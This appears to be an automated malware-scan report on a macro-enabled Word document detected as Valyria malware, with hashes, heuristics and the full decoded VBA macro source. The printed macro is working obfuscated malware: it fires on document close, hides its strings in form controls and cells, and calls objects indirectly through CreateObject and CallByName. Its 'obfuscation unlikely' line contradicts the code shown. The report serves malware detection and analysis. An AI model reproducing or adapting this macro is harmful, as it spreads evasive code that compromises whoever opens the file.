MALICIOUS
Risk Score: 222
Heuristics: 5
- ClamAV: Doc.Malware.Valyria-10033904-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project (VBA macros present)
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: Set lb = CreateObject(UserForm1.ComboBox1)
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: p4t = CallByName(Application, oh, 2)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7906 bytes |

SHA-256 (macros.bas): 1a2003370833daf20a05a364871192e7c587f4518e428d0b2464f62ba82cb261

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public xq, k82dq, obc6n, vsd, bhi
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim lb
q9 = Application.Options.RevisedPropertiesColor
Set lb = CreateObject(UserForm1.ComboBox1)
lb.DisplayAlerts = False
oh = "visible"
womsg = "OnTime"
Dim p7tdc
ds = Application.Options.InlineConversion
If xe > 1009 Then
kvgkm = Application.Options.PasteSmartStyleBehavior
xe = kvgkm
xe = Application.Options.ShortMenuNames
If q9 > 2985 Then
mq = Application.Options.AutoCreateNewDrawings
q9 = mq
End If
End If
bvsi = 1
k7j = 1
While bvsi <> 0 And k7j < 3
Set p7tdc = lb.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
bvsi = Err.Number
k7j = k7j + 1
Wend
If bvsi <> 0 Then
p4t = CallByName(Application, oh, 2)
If p4t = True Then
Set ehqh = CreateObject(UserForm1.ComboBox3)
ehqh.Documents.Open ActiveDocument.FullName, ReadOnly:=True
h8co = Application.Options.AutoFormatAsYouTypeApplyNumberedLists
If ds > 4406 Then
i83a = Application.Options.AutoFormatAsYouTypeInsertOvers
ds = i83a
End If
yklwg = Application.Options.SavePropertiesPrompt
If h8co > 868 Then
akq = Application.Options.EnableMisusedWordsDictionary
h8co = akq
End If
ehqh.Run "ThisDocument.nnn"
Else
gd1l = Application.Options.PasteAdjustTableFormatting
If yklwg > 4688 Then
te = Application.Options.AutoFormatAsYouTypeFormatListItemBeginning
yklwg = te
End If
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
lb.Quit
Exit Sub
End If
Dim fgpf2
Set fgpf2 = lb.sheets(1)
bkfuu = "'"
ly = lb.sheets(3).Cells(20, 21).Value
k82dq = lb.sheets(2).Cells(149, 23).Value
xq = lb.sheets(1).Cells(71, 3).Value
ar = lb.sheets(2).Cells(181, 22).Value
uc = lb.sheets(3).Cells(218, 2).Value
p5 = lb.sheets(3).Cells(153, 13).Value
jt = lb.sheets(2).Cells(154, 50).Value
an = lb.sheets(3).Cells(167, 36).Value
pl = fgpf2.Cells(87, 6).Value
fzyd = lb.sheets(2).Cells(21, 2).Value
bolca = lb.sheets(1).Cells(101, 42).Value
hvt = lb.sheets(3).Cells(92, 27).Value
qh = Application.Options.ReplaceSelection
If gd1l > 3360 Then
w0d = Application.Options.AutoFormatApplyHeadings
gd1l = w0d
End If
uzqt1 = Application.Options.PasteMergeLists
If qh > 3761 Then
zt = Application.Options.MapPaperSize
qh = zt
End If
ra23q = Application.Options.ArabicMode
If uzqt1 > 1787 Then
sf = Application.Options.AllowCombinedAuxiliaryForms
uzqt1 = sf
End If
edyis = lb.sheets(2).Cells(225, 43).Value
t1 = lb.sheets(3).Cells(177, 40).Value
mf = lb.sheets(3).Cells(64, 34).Value
fkch = lb.sheets(3).Cells(56, 7).Value
nqm54 = lb.sheets(1).Cells(119, 22).Value
d7p0 = lb.sheets(2).Cells(165, 8).Value
f1 = fgpf2.Cells(142, 19).Value
gx = lb.sheets(3).Cells(99, 12).Value
syah9 = lb.sheets(1).Cells(41, 31).Value
ui0z = lb.sheets(2).Cells(246, 15).Value
bhi = fgpf2.Cells(120, 25).Value
kcjo = fgpf2.Cells(254, 1).Value
a7091 = lb.sheets(2).Cells(138, 3).Value
pt = lb.sheets(1).Cells(173, 17).Value
qddz5 = CallByName(lb, ly, 2)
Set gjnc = UserForm1.Controls.Add("Forms.ComboBox.1")
gjnc.Value = jt & qddz5 & gx
Set lf = UserForm1.Controls.Add("Forms.ComboBox.1")
lf.Value = a7091
CallByName CreateObject(bolca), edyis, 1, gjnc, uc, lf
vd = Application.Options.ShowFormatError
If ra23q > 3706 Then
nnefu = Application.Options.RevisedPropertiesMark
ra23q = nnefu
End If
Set g6x4 = CreateObject(ui0z)
Set d5x = CallByName(g6x4, mf, 2)
Set lxj2b = CallByName(d5x, syah9, 1)
Set d7p0 = CallByName(g6x4, d7p0, 2)
kvcx = Application.Options.PasteMergeFromPPT
If vd > 2148 Then
n9dkz = Application.Options.TypeNReplace
vd = n9dkz
End If
Set vsd = g6x4
Set ar = CallByName(d7p0, ar, 2)
Set pl = CallByName(ar, pl, 2)
Set jbe = CallByName(pl, pt, 1, f1)
jhr = Application.Options.MultipleWordConversionsMode
Set xq = CallByName(jbe, xq, 2)
t1 = CallByName(xq, t1, 2)
CallByName xq, hvt, 1, 1, t1
Set obc6n = UserForm1.Controls.Add("Forms.ComboBox.1")
ahu = Application.Options.DisableFeaturesbyDefault
If jhr > 1411 Then
fh5q = Application.Options.AutoFormatReplaceHyperlinks
jhr = fh5q
End If
obc6n.Value = p5 & nqm54
UserForm3.ComboBox1 = fzyd
vs42 = Application.Options.AutoFormatAsYouTypeMatchParentheses
If ahu > 4670 Then
klhv = Application.Options.GridDistanceHorizontal
ahu = klhv
End If
obc6n.Value = kcjo
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = t1
g6x4 = Nothing
p7tdc = Nothing
fgpf2 = Nothing
d5x = Nothing
lxj2b = Nothing
d7p0 = Nothing
ar = Nothing
eyju = Application.Options.EnableSound
If vs42 > 3378 Then
ee8xj = Application.Height
vs42 = ee8xj
End If
pl = Nothing
jbe = Nothing
xq = Nothing
vsd = Nothing
hi = Application.Options.AutoFormatAsYouTypeDeleteAutoSpaces
If eyju > 232 Then
ig = Application.Options.DefaultBorderLineStyle
eyju = ig
End If
DoEvents
CallByName lb, an, 1
lb = Nothing
DoEvents
CallByName CreateObject(bolca), fkch, 1, jt & qddz5 & gx
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B01E4432-5C29-4ECB-9F53-BFED705DF47D}{16570F76-963E-41B3-9B5F-9A3C53236EC1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{17B6A17C-DF4F-4AD2-8F00-12045B533855}{81566F54-5CA9-488B-8438-2C30A3A1C179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
ye8kw = UserForm2.Controls.Count - 1
cz2d = Application.Options.DisableFeaturesbyDefault
If io > 1650 Then
kj = Application.Options.RevisedLinesMark
io = kj
End If
If Len(UserForm1.ComboBox4) > 10 Then
ye8kw = ye8kw * 2
End If
fhiq7 = ""
For io = 1 To ye8kw Step 2
fhiq7 = fhiq7 & UserForm2.Controls.Item(io)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem fhiq7
krtl = Application.Options.AutoCreateNewDrawings
If cz2d > 3717 Then
b4d7 = Application.Options.PasteMergeLists
cz2d = b4d7
End If
ComboBox1.AddItem "x9se1"
Exit Sub
ErrorHandler:
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{30DCD49A-512F-49AB-9150-16C448490F42}{D68C741F-0FC9-4788-8E89-C5CBD9E8B7B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
nze9l = Application.Options.FormatScanning
If obc6n > 4623 Then
xyux6 = Application.Options.PasteSmartStyleBehavior
obc6n = xyux6
End If
CallByName ActiveDocument.xq, ActiveDocument.k82dq, VbMethod, ActiveDocument.obc6n
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{70A24809-CD99-46FC-B0DD-15A2D43511BF}{EB6FB524-7CA1-4280-BAFB-8AAEF3D4177C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.vsd, ActiveDocument.bhi, VbMethod, ActiveDocument.obc6n
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 40960 bytes |

SHA-256 (vbaProject_00.bin): e0d7035fa1e2bbf34cfdca266bb9df13d38022b711cce40ac3cebce76529946c
Detection
ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely